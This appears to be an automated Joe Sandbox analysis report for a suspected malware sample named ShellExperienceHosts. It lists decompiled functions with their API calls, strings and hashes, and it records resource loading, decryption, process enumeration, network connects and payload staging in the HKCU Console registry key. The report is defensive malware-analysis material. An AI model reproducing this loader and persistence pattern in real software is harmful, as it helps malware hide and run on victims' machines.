Function 6C9B2900 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000), ref: 6C9B2926
FindResourceW.KERNEL32(00000000,004F0043,?), ref: 6C9B2991
LoadResource.KERNEL32(00000000,00000000), ref: 6C9B299F
SizeofResource.KERNEL32(00000000,00000000), ref: 6C9B29A9
LockResource.KERNEL32(00000000), ref: 6C9B29B2

Strings

.dll, xrefs: 6C9B291B
Base, xrefs: 6C9B2914
yyzy, xrefs: 6C9B290C

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Resource$FindHandleLoadLockModuleSizeof
String ID: .dll$Base$yyzy
API String ID: 1601749889-3303919769
Opcode ID: f1de3777c2e89af0bda1229032ac9094b55384a2dc33b7f1c9f7ba6a6de33288
Instruction ID: edf66c9baabb100fef0f1cb09129facf96959dc5ec5e65c3d72f6f38d4120e64
Opcode Fuzzy Hash: f1de3777c2e89af0bda1229032ac9094b55384a2dc33b7f1c9f7ba6a6de33288
Instruction Fuzzy Hash: BA21A6B5900249AFCF109FD5A848AEFBBFCEF55318F104019E408A7301E7798A488BA9

Function 6C9A68B0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 149encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9A6440: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6C9A6499
Part of subcall function 6C9A6440: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,00000000,00000000,00000000), ref: 6C9A6517

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 6C9A69BE
CryptImportKey.ADVAPI32(00000000,00000208,00000014,00000000,00000000,?), ref: 6C9A6A13
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6C9A6A22
CryptSetKeyParam.ADVAPI32(00000000,00000001,00000000,00000000), ref: 6C9A6A40
CryptDestroyKey.ADVAPI32(00000000), ref: 6C9A6A49
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6C9A6A54
CryptSetKeyParam.ADVAPI32(00000000,00000004,?,00000000), ref: 6C9A6A76
CryptDestroyKey.ADVAPI32(00000000), ref: 6C9A6A7F
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6C9A6A8A
CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?), ref: 6C9A6B02
CryptDestroyKey.ADVAPI32(00000000,?,?), ref: 6C9A6B0F
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?), ref: 6C9A6B1A

Strings

ed__, xrefs: 6C9A6924
Failed to import key., xrefs: 6C9A6A28
Salt, xrefs: 6C9A691C
wi65, xrefs: 6C9A698B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Crypt$Context$Release$Destroy$BinaryParamString$AcquireDecryptImport
String ID: Failed to import key.$Salt$ed__$wi65
API String ID: 3167259108-1924075180
Opcode ID: 22f9fe792e5d265b873bf8219b4014eafe082dd1daa53baf0bd48cc85a76a03d
Instruction ID: c1b1f0c9cebc1c34cbecd32be3500d6dea3e82d9eb806418f2e3fd9188eed989
Opcode Fuzzy Hash: 22f9fe792e5d265b873bf8219b4014eafe082dd1daa53baf0bd48cc85a76a03d
Instruction Fuzzy Hash: 535152719002089FEB10CFE8CD55BEEBBB8EF05308F244559E515EB680DB75A94ACB91

Function 032D6050 Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 032D607C
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 032D6088
Process32FirstW.KERNEL32(00000000,00000000), ref: 032D60B9
Process32NextW.KERNEL32(00000000,0000022C), ref: 032D610F
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 032D6116

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
String ID:
API String ID: 2526126748-0
Opcode ID: 61dfd48eae7198ac00e62d2552d776b41fe2cbf489dc24c5cbae8bc13d47c79f
Instruction ID: 7e0d9a8c7b144af55ceb159b815cef823d182cbbf014fa80d82ce6bb3fb6d34f
Opcode Fuzzy Hash: 61dfd48eae7198ac00e62d2552d776b41fe2cbf489dc24c5cbae8bc13d47c79f
Instruction Fuzzy Hash: 39210A31620215ABDB20FF64FC49BEAB368FF15721F5446A5DC0A971C0EB319A80CA50

Function 6C9A6560 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,75496E60), ref: 6C9A65B2
CryptDestroyHash.ADVAPI32(?,?,6CB819B8,Failed to acquire cryptographic context.), ref: 6C9A6871
CryptReleaseContext.ADVAPI32(?,00000000), ref: 6C9A687C

Strings

Failed to hash data., xrefs: 6C9A6882
Failed to acquire cryptographic context., xrefs: 6C9A6853

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Crypt$Context$AcquireDestroyHashRelease
String ID: Failed to acquire cryptographic context.$Failed to hash data.
API String ID: 2937476097-442885999
Opcode ID: 104019057fcb1dc37816fb5d8e0648b88b4afdb1b786064763945ed46a7e1b97
Instruction ID: e66b0834f86c0e308585d4d4b465e5a0dba99df414904ee1a27baa4f3a0ede0c
Opcode Fuzzy Hash: 104019057fcb1dc37816fb5d8e0648b88b4afdb1b786064763945ed46a7e1b97
Instruction Fuzzy Hash: 3111E6B1C01298AFCB50DFE8CD44BDEBBF8AB09710F20492AA129F6A40E7745549CB54

Function 032D3360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(?,?,00000000), ref: 032D3413
_memmove.LIBCMT ref: 032D34A5

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Time_memmovetime
String ID:
API String ID: 1463837790-0
Opcode ID: a9262743d9ad670337d21c8c86997db3f6e4a285f82ea1dbeb521c2869229430
Instruction ID: 26a30e38b04738879eb2874fb9b9357a17fe992b681612dc955a76426641e3d7
Opcode Fuzzy Hash: a9262743d9ad670337d21c8c86997db3f6e4a285f82ea1dbeb521c2869229430
Instruction Fuzzy Hash: 1A51F57A7202029FD711CF69C9C0A6AF7A9FF44214718866CEA19CBB04DB75F891CBD1

Function 6C9DFE5D Relevance: 68.6, APIs: 34, Strings: 5, Instructions: 356
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9DFE67

Part of subcall function 6C9C7012: __EH_prolog3.LIBCMT ref: 6C9C7019
Part of subcall function 6C9C7012: GetWindowDC.USER32(00000000,00000004,6C9E03E2,00000000), ref: 6C9C7045

GetDeviceCaps.GDI32(?,00000058), ref: 6C9DFE87
DeleteObject.GDI32(00000000), ref: 6C9DFEE3
DeleteObject.GDI32(00000000), ref: 6C9DFF01
DeleteObject.GDI32(00000000), ref: 6C9DFF1F
DeleteObject.GDI32(00000000), ref: 6C9DFF3D
DeleteObject.GDI32(00000000), ref: 6C9DFF5B
DeleteObject.GDI32(00000000), ref: 6C9DFF79
DeleteObject.GDI32(00000000), ref: 6C9DFF97
DeleteObject.GDI32(00000000), ref: 6C9DFFB5
DeleteObject.GDI32(00000000), ref: 6C9DFFD3
DeleteObject.GDI32(00000000), ref: 6C9DFFF1
GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 6C9E0029
lstrcpyW.KERNEL32(?,?), ref: 6C9E007E
EnumFontFamiliesW.GDI32(?,00000000,6C9DF6C2,Segoe UI), ref: 6C9E00A5
lstrcpyW.KERNEL32(?,Segoe UI), ref: 6C9E00B8
EnumFontFamiliesW.GDI32(?,00000000,6C9DF6C2,Tahoma), ref: 6C9E00D6
lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 6C9E00F0
CreateFontIndirectW.GDI32(?), ref: 6C9E00FA
CreateFontIndirectW.GDI32(?), ref: 6C9E0142
CreateFontIndirectW.GDI32(?), ref: 6C9E0181
CreateFontIndirectW.GDI32(?), ref: 6C9E01AD
CreateFontIndirectW.GDI32(?), ref: 6C9E01CE
GetSystemMetrics.USER32(00000048), ref: 6C9E01ED
lstrcpyW.KERNEL32(?,Marlett), ref: 6C9E0200
CreateFontIndirectW.GDI32(?), ref: 6C9E020A
GetStockObject.GDI32(00000011), ref: 6C9E0236
GetObjectW.GDI32(00000000,0000005C,?), ref: 6C9E0251
lstrcpyW.KERNEL32(?,Arial), ref: 6C9E0292
CreateFontIndirectW.GDI32(?), ref: 6C9E029C
CreateFontIndirectW.GDI32(?), ref: 6C9E02B5
GetObjectW.GDI32(?,0000005C,?), ref: 6C9E02D3
CreateFontIndirectW.GDI32(?), ref: 6C9E02E1
CreateFontIndirectW.GDI32(?), ref: 6C9E0302

Part of subcall function 6C9E079A: __EH_prolog3_GS.LIBCMT ref: 6C9E07A1
Part of subcall function 6C9E079A: GetTextMetricsW.GDI32(?,?), ref: 6C9E07D6
Part of subcall function 6C9E079A: GetTextMetricsW.GDI32(?,?), ref: 6C9E0816

Strings

Arial, xrefs: 6C9E0282
MS Sans Serif, xrefs: 6C9E00EA
Marlett, xrefs: 6C9E01FA
Segoe UI, xrefs: 6C9E0093, 6C9E00AF
Tahoma, xrefs: 6C9E00C4, 6C9E00E3

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_$CapsCharsetDeviceH_prolog3InfoStockSystemWindow
String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
API String ID: 2837096512-1395034203
Opcode ID: 78c21d5cc8a7a7d3d223223414159de3ff7a0d3792306582951bf86fcb351774
Instruction ID: 05fc96e74107992433e5f6a8b12ea6a4cd427cfa5b30989645cbb21404fe603f
Opcode Fuzzy Hash: 78c21d5cc8a7a7d3d223223414159de3ff7a0d3792306582951bf86fcb351774
Instruction Fuzzy Hash: E2E16071A007899FDF21DBB4C849BDEB7BCBF2A309F00855AE45AA7640DB34E549CB11

Function 6C9E037C Relevance: 64.8, APIs: 43, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 6C9E0383
GetSysColor.USER32(00000016), ref: 6C9E038C
GetSysColor.USER32(0000000F), ref: 6C9E039F
GetSysColor.USER32(00000015), ref: 6C9E03B6
GetSysColor.USER32(0000000F), ref: 6C9E03C2
GetDeviceCaps.GDI32(?,0000000C), ref: 6C9E03EA
GetSysColor.USER32(0000000F), ref: 6C9E03F8
GetSysColor.USER32(00000010), ref: 6C9E0406
GetSysColor.USER32(00000015), ref: 6C9E0414
GetSysColor.USER32(00000016), ref: 6C9E0422
GetSysColor.USER32(00000014), ref: 6C9E0430
GetSysColor.USER32(00000012), ref: 6C9E043E
GetSysColor.USER32(00000011), ref: 6C9E044C
GetSysColor.USER32(00000006), ref: 6C9E0457
GetSysColor.USER32(0000000D), ref: 6C9E0462
GetSysColor.USER32(0000000E), ref: 6C9E046D
GetSysColor.USER32(00000005), ref: 6C9E0478
GetSysColor.USER32(00000008), ref: 6C9E0486
GetSysColor.USER32(00000009), ref: 6C9E0491
GetSysColor.USER32(00000007), ref: 6C9E049C
GetSysColor.USER32(00000002), ref: 6C9E04A7
GetSysColor.USER32(00000003), ref: 6C9E04B2
GetSysColor.USER32(0000001B), ref: 6C9E04C0
GetSysColor.USER32(0000001C), ref: 6C9E04CE
GetSysColor.USER32(0000000A), ref: 6C9E04DC
GetSysColor.USER32(0000000B), ref: 6C9E04EA
GetSysColor.USER32(00000013), ref: 6C9E04F8
GetSysColor.USER32(0000001A), ref: 6C9E0521
GetSysColorBrush.USER32(00000010), ref: 6C9E0532
GetSysColorBrush.USER32(00000014), ref: 6C9E0545
GetSysColorBrush.USER32(00000005), ref: 6C9E0558
CreateSolidBrush.GDI32(?), ref: 6C9E0579
CreateSolidBrush.GDI32(?), ref: 6C9E0597
CreateSolidBrush.GDI32(?), ref: 6C9E05B5
CreateSolidBrush.GDI32(?), ref: 6C9E05D6
CreateSolidBrush.GDI32(?), ref: 6C9E05F4
CreateSolidBrush.GDI32(?), ref: 6C9E0612
CreateSolidBrush.GDI32(?), ref: 6C9E0630
CreatePen.GDI32(00000000,00000001,00000000), ref: 6C9E0656
CreatePen.GDI32(00000000,00000001,00000000), ref: 6C9E067A
CreatePen.GDI32(00000000,00000001,00000000), ref: 6C9E069E
CreateSolidBrush.GDI32(?), ref: 6C9E071C
CreatePatternBrush.GDI32(00000000), ref: 6C9E075A

Part of subcall function 6C9C7A3C: DeleteObject.GDI32(00000000), ref: 6C9C7A4B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
String ID:
API String ID: 3754413814-0
Opcode ID: 235374afab945f54a46002aa9ace2f37fa239595265bcab725d8caa4a7714f58
Instruction ID: 044fd3a5bad21c7da063190178489699f7dd0d89a074c1518ff1cb14cb055042
Opcode Fuzzy Hash: 235374afab945f54a46002aa9ace2f37fa239595265bcab725d8caa4a7714f58
Instruction Fuzzy Hash: 80C19C70B01A82AFDB459FB0884879DBBB0BF2A705F001115E24AD7A80CF74E554EFE2

Function 100054C0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263
registrymemorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 10005507
RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 1000552E
_memset.LIBCMT ref: 10005548
RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 10005563
VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005586
RegCloseKey.ADVAPI32(?), ref: 100055B1
VirtualFree.KERNEL32(02C30000,00000000,00008000), ref: 10005605
_memset.LIBCMT ref: 10005669
_memset.LIBCMT ref: 1000568D
_memset.LIBCMT ref: 1000569F
VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005726
RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 10005799
RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 100057AC
RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 100057C4
RegCloseKey.KERNEL32(?), ref: 100057CE
Sleep.KERNEL32(00000BB8), ref: 100057FE

Strings

Console\0, xrefs: 100054F3, 1000578F
!jWW, xrefs: 10005630
l, xrefs: 10005644
e, xrefs: 100054DC
_, xrefs: 1000564E
9e9e85e05ee16fc372a0c7df6549fbd4, xrefs: 10005528, 1000555D, 100057A6, 100057BE
{vU_, xrefs: 10005626
., xrefs: 1000563A
i, xrefs: 10005658
0d3b34577c0a66584d5bdc849e214016, xrefs: 100055BA

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
API String ID: 354323817-737951744
Opcode ID: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
Instruction ID: 005816a77294032e0ea7aedf6318117014c310f5a4f2017eaf50af4860f80873
Opcode Fuzzy Hash: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
Instruction Fuzzy Hash: 5891D475A00718ABF710CF60CC84FAB77BAFB88741F508158FA089B245DB75EA40CB51

Function 032D9E50 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 314
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 032D9E7B
GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 032D9EFC
GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 032D9F24
GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 032D9F7F
_malloc.LIBCMT ref: 032D9FC0

Part of subcall function 032DF673: __FF_MSGBANNER.LIBCMT ref: 032DF68C
Part of subcall function 032DF673: __NMSG_WRITE.LIBCMT ref: 032DF693
Part of subcall function 032DF673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,032E4500,00000000,00000001,00000000,?,032E8DE6,00000018,032F6448,0000000C,032E8E76), ref: 032DF6B8

_free.LIBCMT ref: 032DA000
GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 032DA028
SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 032DA0B7
GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 032DA112
_free.LIBCMT ref: 032DA134
_memcpy_s.LIBCMT ref: 032DA183
GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 032DA1D0
GdipCreateBitmapFromScan0.GDIPLUS(?,?,032F5A78,00022009,?,00000000,?,00000000), ref: 032DA22C
GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 032DA24C
GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 032DA267
GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 032DA274
GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 032DA27B
_free.LIBCMT ref: 032DA296

Strings

&, xrefs: 032D9EE1

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
String ID: &
API String ID: 640422297-3042966939
Opcode ID: 71969fb457419e2f0520dcb9da925f6d4902bf9cce3159f0d31cce3c54312b1c
Instruction ID: 664b3e8ddf4670b4d0a324b5cd2693e1543f348a12143fa8c3d913be84262455
Opcode Fuzzy Hash: 71969fb457419e2f0520dcb9da925f6d4902bf9cce3159f0d31cce3c54312b1c
Instruction Fuzzy Hash: 2CD160F5A102199FDB20DF55DC84B9AB7B8EF48304F0485ADE609A7201D774AAC5CFA8

Function 032D2DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203
networkstringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResetEvent.KERNEL32(?), ref: 032D2DBB
InterlockedExchange.KERNEL32(?,00000000), ref: 032D2DC7
timeGetTime.WINMM ref: 032D2DCD
socket.WS2_32(00000002,00000001,00000006), ref: 032D2DFA
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 032D2E26
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 032D2E32
lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 032D2E51
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 032D2E5D
gethostbyname.WS2_32(00000000), ref: 032D2E6B
htons.WS2_32(?), ref: 032D2E8D
connect.WS2_32(?,?,00000010), ref: 032D2EAB

Strings

0u, xrefs: 032D2F1C

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
String ID: 0u
API String ID: 640718063-3203441087
Opcode ID: 193f505219f720a3cb1eb91bdee5662b1d419934fd5e3f50b7bbc9ea97c3449a
Instruction ID: e9c83c9838193ce96f0d188bc3e8cf09cb9ecd86d919fb7b13aa927d68900951
Opcode Fuzzy Hash: 193f505219f720a3cb1eb91bdee5662b1d419934fd5e3f50b7bbc9ea97c3449a
Instruction Fuzzy Hash: 276165B5650304AFD720EFA4EC45FABB7B8FF49B10F104529F655AB2C0D7B0A5448B64

Function 10002D80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203
networkstringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResetEvent.KERNEL32(?), ref: 10002D9B
InterlockedExchange.KERNEL32(?,00000000), ref: 10002DA7
timeGetTime.WINMM ref: 10002DAD
socket.WS2_32(00000002,00000001,00000006), ref: 10002DDA
lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 10002E06
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E12
lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 10002E31
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E3D
gethostbyname.WS2_32(00000000), ref: 10002E4B
htons.WS2_32(?), ref: 10002E6D
connect.WS2_32(?,?,00000010), ref: 10002E8B

Strings

0u, xrefs: 10002EFC

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
String ID: 0u
API String ID: 640718063-3203441087
Opcode ID: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
Instruction ID: d5696d751933d4553be470da2890fc26df070c3c16b6f4ec0f7763c80930fe30
Opcode Fuzzy Hash: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
Instruction Fuzzy Hash: 136152B1A40304BFE710DFA4CC85FAAB7B9FF49711F104629F646AB2D0D7B1A9048B64

Function 032DAD10 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 346
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 032DAD53
RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 032DAD73

Strings

IpDatespecial, xrefs: 032DAD6D
Console\0, xrefs: 032DB0DC
%s_bin, xrefs: 032DAE33
Console, xrefs: 032DAD39

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: OpenQueryValue
String ID: %s_bin$Console$Console\0$IpDatespecial
API String ID: 4153817207-1338088003
Opcode ID: 9ab764281ab6d34cb37ddc1ba4127798bab539da836a0f818733120e4e1fcbfb
Instruction ID: dbb764a7d65eaf8de09735e73adfe44eff2be27d6a7debc449c847bc431dc4f7
Opcode Fuzzy Hash: 9ab764281ab6d34cb37ddc1ba4127798bab539da836a0f818733120e4e1fcbfb
